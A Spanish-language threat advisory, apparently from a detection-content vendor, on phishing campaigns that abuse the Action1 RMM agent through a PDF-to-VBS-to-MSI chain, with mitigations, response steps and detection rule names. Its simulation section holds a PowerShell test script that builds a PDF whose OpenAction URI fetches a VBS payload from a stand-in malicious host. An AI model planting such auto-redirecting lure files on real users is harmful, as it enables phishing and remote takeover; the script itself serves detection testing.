El Abuso de Herramientas RMM Continúa Creciendo en Campañas de Amenazas Activas
Detection stack
- AIDR
- Alert
- ETL
- Query
Resumen
Los actores de amenazas están abusando de herramientas de Gestión y Monitoreo Remoto (RMM), particularmente Action1, para establecer acceso persistente dentro de entornos comprometidos. El ataque comienza con un correo electrónico de phishing que contiene un PDF malicioso que redirige a las víctimas a un archivo VBS. El script luego descarga e instala un paquete MSI que contiene el agente legítimo de Action1, habilitando el acceso remoto no autorizado.
Investigación
La investigación descubrió un PDF malicioso que aprovecha las palabras clave OpenAction y URI para iniciar una descarga desde una URL alojada en Vercel. El análisis del paquete MSI recuperado reveló archivos legítimos de Action1 Corporation siendo mal utilizados a través de la propia infraestructura en la nube del proveedor. El agente instalado contiene un CustomerID específico y se comunica con un dominio legítimo de Action1.
Mitigación
Las organizaciones deben configurar el filtrado de correos electrónicos para identificar estructuras sospechosas de PDF que contengan palabras clave como OpenAction o URI. Los equipos de seguridad deben monitorear para detectar instalaciones no autorizadas de herramientas RMM y la creación del servicio A1Agent. Bloquear conexiones a infraestructuras en la nube RMM inesperadas e identificar CustomerIDs inusuales o no autorizados puede reducir aún más el riesgo de abuso de acceso remoto.
Respuesta
Cuando se detecta actividad maliciosa de RMM, aísle el host afectado para prevenir la ejecución adicional de comandos remotos. Investigue el correo electrónico de phishing originario y conduzca un análisis forense de los archivos VBS y MSI asociados. Revoque credenciales potencialmente comprometidas y revise las configuraciones del agente de Action1 en busca de indicadores de acceso remoto no autorizado o persistencia.
Flujo de Ataque
Todavía estamos actualizando esta parte.
Detecciones
LOLBAS WScript / CScript (mediante creación de procesos)
Software de Acceso / Gestión Remota Alternativa (mediante creación de procesos)
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios / Herramientas de Terceros (mediante proxy)
Posible Infiltración / Exfiltración de Datos / C2 a través de Servicios / Herramientas de Terceros (mediante dns)
Posible Actividad de Comando y Control por Intento de Comunicación de Dominio de Software de Acceso Remoto (mediante dns)
IOCs (HashSha256) para detectar: Más Herramientas RMM en Libertad
Conexión remota a servidores corporativos de Action1 [Conexión de red de Windows]
PDF OpenAction y Redirección URI a VBS Malicioso [Evento de archivo de Windows]
Ejecución de Simulación
-
Narrativa del Ataque y Comandos: El adversario está simulando una campaña de phishing. El objetivo es entregar un archivo llamado
Recibo de Transacción .pdfa una víctima. El PDF está diseñado de tal manera que en cuanto el usuario lo abre, el comando/OpenActionse activa un/URIredireccionamiento. Este redireccionamiento está diseñado para llevar al usuario a un sitio que sirva un VBScript malicioso. Para activar la regla de detección específica proporcionada, crearemos un archivo con el nombre y cadenas internas exactas requeridas. -
Script de Prueba de Regresión:
# Script de Simulación: Activación de la Detección de PDF OpenAction $targetFile = "$env:USERPROFILEDesktopRecibo de Transacción .pdf" # Creación del contenido PDF "malicioso" para coincidir con las palabras clave de detección $pdfContent = @" %PDF-1.1 1 0 obj << /Type /Catalog /Pages 2 0 R /OpenAction << /S /URI /URI (http://malicious-site.com/payload.vbs) >> >> endobj 2 0 obj << /Type /Pages /Parent 1 0 R /Count 1 >> endobj trailer << /Root 1 0 R >> %%EOF "@ # Escritura del archivo en disco para activar la detección 'file_event' $pdfContent | Out-File -FilePath $targetFile -Encoding ascii Write-Host "Archivo de simulación creado en: $targetFile" Write-Host "Revise su SIEM para la alerta de detección." -
Comandos de Limpieza:
# Limpieza: Remover el archivo simulado malicioso $targetFile = "$env:USERPROFILEDesktopRecibo de Transacción .pdf" if (Test-Path $targetFile) { Remove-Item -Path $targetFile -Force Write-Host "Limpieza completa: $targetFile removido." } else { Write-Host "Limpieza: Archivo no encontrado." }